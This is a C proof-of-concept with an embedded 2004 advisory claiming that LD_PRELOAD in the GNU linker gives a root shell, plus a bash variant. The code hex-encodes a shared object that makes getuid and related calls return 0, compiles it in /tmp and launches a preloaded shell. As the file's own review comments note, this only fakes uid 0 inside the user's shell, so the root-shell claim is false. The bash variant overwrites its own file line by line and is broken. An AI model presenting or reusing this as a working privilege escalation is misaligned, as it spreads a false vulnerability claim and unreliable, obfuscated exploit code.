
bug


An exploit that, they say, gives root.

/*
--------------------------------------------------------
[N]eo [S]ecurity [T]eam [NST]® - Advisory #01 - 28/12/04
--------------------------------------------------------
Program: ld - The GNU linker
Homepage: http://gcc.gnu.org
Vulnerable Versions: GNU gcc 3.4.3 and prior
Risk: High!!
Impact: Unchecked length fields
---------------------------------------------------------

- Description
---------------------------------------------------------
$ LD_PRELOAD=/`perl -e 'print "A"x2000'`/ passwd
Value starts and ends with a slash and contains about 1200 characters.
LD_PRELOAD doesn't ignore setuid executables, like this one.
Unchecked length fields.

setuid(0);
setreuid(0,0);
int getuid() { return 0; }
int geteuid() { return 0; }
int getgid() { return 0; }
int getegid() { return 0; }

- Tested
---------------------------------------------------------
I have done minimal testing on this.
Slackware 10.0

- Exploitation
---------------------------------------------------------
$gcc ld_xpl_nst.c -o ld_xp_nst
$./ld_xp_nst
sh-3.00# id
uid=0(root) gid=0(root) groups=100(users)
sh-3.00#

This will give you a root shell

- Solutions
--------------------------------------------------------
Not Yet or i don't know xD

- References
--------------------------------------------------------
http://neosecurityteam.org/Advisories/Advisory-01.txt


- Credits
-------------------------------------------------
Discovered by HaCkZaTaN <hck_zatan@hotmail.com>

[N]eo [S]ecurity [T]eam [NST]® - http://neosecurityteam.org/

Got Questions? http://neosecurityteam.org/foros/
*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

/*
 * Source text of the shared object that main() writes out, compiles and
 * preloads.  The hex escapes decode to the four one-line C definitions
 * already quoted in plain text in the advisory comment above:
 *   int getuid()  { return 0; }
 *   int geteuid() { return 0; }
 *   int getgid()  { return 0; }
 *   int getegid() { return 0; }
 * each terminated by '\n'.
 *
 * The final fragment is "\x0/bin/sh".  '/' is not a hex digit, so "\x0"
 * is a single NUL byte; the "/bin/sh" that follows it is never emitted by
 * the "%s" fprintf() in main() and is dead data inside the array.
 */
char NstCode[] =
"\x69\x6e\x74\x20\x67\x65\x74\x75\x69"
"\x64\x28\x29\x20\x7b\x20\x72\x65\x74"
"\x75\x72\x6e\x20\x30\x3b\x20\x7d\x0a"
"\x69\x6e\x74\x20\x67\x65\x74\x65\x75"
"\x69\x64\x28\x29\x20\x7b\x20\x72\x65"
"\x74\x75\x72\x6e\x20\x30\x3b\x20\x7d"
"\x0a\x69\x6e\x74\x20\x67\x65\x74\x67"
"\x69\x64\x28\x29\x20\x7b\x20\x72\x65"
"\x74\x75\x72\x6e\x20\x30\x3b\x20\x7d"
"\x0a\x69\x6e\x74\x20\x67\x65\x74\x65"
"\x67\x69\x64\x28\x29\x20\x7b\x20\x72"
"\x65\x74\x75\x72\x6e\x20\x30\x3b\x20"
"\x7d\x0a\x0/bin/sh";

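/* Terminal-escape helpers; FG and RC are defined after main(). */
void FG(int Opt, int Colour);   /* emit SGR attribute Opt and colour code Colour */
void BG(int Colour);            /* declared here but never defined or called in this file */
void RC(void);                  /* reset SGR attributes; "(void)" makes this a real prototype
                                   instead of the unspecified-parameter form "RC()" */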

/*
 * Entry point of the advisory's proof-of-concept.  In order, the visible
 * code:
 *   1. prints a banner in ANSI colour 37 (each nested loop runs exactly
 *      once: x == 1, y == 37);
 *   2. writes NstCode to the fixed path /tmp/nst.c;
 *   3. via system(), compiles it to /tmp/nst.nfo and deletes the source;
 *   4. via system(), starts /bin/sh with that object in LD_PRELOAD;
 *   5. prints the banner again and returns 0.
 *
 * Review notes (defects and risks, left unchanged here):
 *   - fopen() is not checked; on failure fprintf() and fclose() run on a
 *     NULL FILE*.
 *   - both system() return values are ignored, so a failed compile still
 *     proceeds to the LD_PRELOAD step.
 *   - /tmp/nst.c and /tmp/nst.nfo are fixed, predictable names in a
 *     world-writable directory (classic temp-file race; mkstemp() is the
 *     usual remedy).
 *   - NOTE(review): the preloaded object only replaces the libc
 *     getuid()/geteuid()/getgid()/getegid() wrappers inside that shell and
 *     the children that inherit LD_PRELOAD; "id" printing uid=0 in the
 *     advisory transcript is consistent with those overrides rather than
 *     with any change of kernel-side credentials, so the "root shell"
 *     claim is unverified by this code.
 */
int main()
{
FILE *Nst_C;
int x, y;
/* banner: single iteration of each loop */
for(x = 1; x < 2; x++)
for(y = 37; y < 38; y++) {
FG(x,y);
printf("[N]eo [S]ecurity [T]eam [N][S][T]!\n");
}
RC();
/* unchecked fopen(); "%s" stops at the NUL inside NstCode, so "/bin/sh" is not written */
Nst_C=fopen("/tmp/nst.c","w");
fprintf(Nst_C,"%s",NstCode);
fclose(Nst_C);
/* build the shared object, then remove the source; exit status ignored */
system("gcc -shared -o /tmp/nst.nfo /tmp/nst.c;rm -f /tmp/nst.c");
/* interactive shell with the object preloaded; blocks until that shell exits */
system("LD_PRELOAD=/tmp/nst.nfo /bin/sh");
for(x = 1; x < 2; x++)
for(y = 37; y < 38; y++) {
FG(x,y);
printf("[N]eo [S]ecurity [T]eam [N][S][T]!\n");
}
RC();
return 0;
}

/*
 * Write an ANSI SGR sequence "ESC [ Opt ; Colour m" to stdout.
 * Opt is the attribute number and Colour the colour code; no validation
 * is performed on either value.
 */
void FG(int Opt, int Colour) {
    fprintf(stdout, "\x1b[%d;%dm", Opt, Colour);
}

/* Write the SGR reset sequence "ESC [ 0 ; m" to stdout. */
void RC(void) {
    fputs("\x1b[0;m", stdout);
}

/* Bash Code:

#! /bin/bash
echo -e "\x69\x6e\x74\x20\x67\x65\x74\x75\x69\x64\x28\x29\x20\x7b\x20\x72\x65"
>/tmp/nst.c
echo -e "\x74\x75\x72\x6e\x20\x30\x3b\x20\x7d\x0a\x69\x6e\x74\x20\x67\x65\x74"
>/tmp/nst.c
echo -e "\x65\x75\x69\x64\x28\x29\x20\x7b\x20\x72\x65\x74\x75\x72\x6e\x20\x30"
>/tmp/nst.c
echo -e "\x3b\x20\x7d\x0a\x69\x6e\x74\x20\x67\x65\x74\x67\x69\x64\x28\x29\x20"
>/tmp/nst.c
echo -e "\x7b\x20\x72\x65\x74\x75\x72\x6e\x20\x30\x3b\x20\x7d\x0a\x69\x6e\x74"
>/tmp/nst.c
echo -e "\x20\x67\x65\x74\x65\x67\x69\x64\x28\x29\x20\x7b\x20\x72\x65\x74\x75"
>/tmp/nst.c
echo -e "\x72\x6e\x20\x30\x3b\x20\x7d\x0a\x0/bin/sh">/tmp/nst.c

sleep 1
gcc -shared -o /tmp/nst.nfo /tmp/nst.c
rm -rf /tmp/nst.c
sleep 4
echo -e "\n"
export LD_LIBRARY_PATH=/tmp
LD_PRELOAD=/tmp/nst.nfo /bin/sh
*/

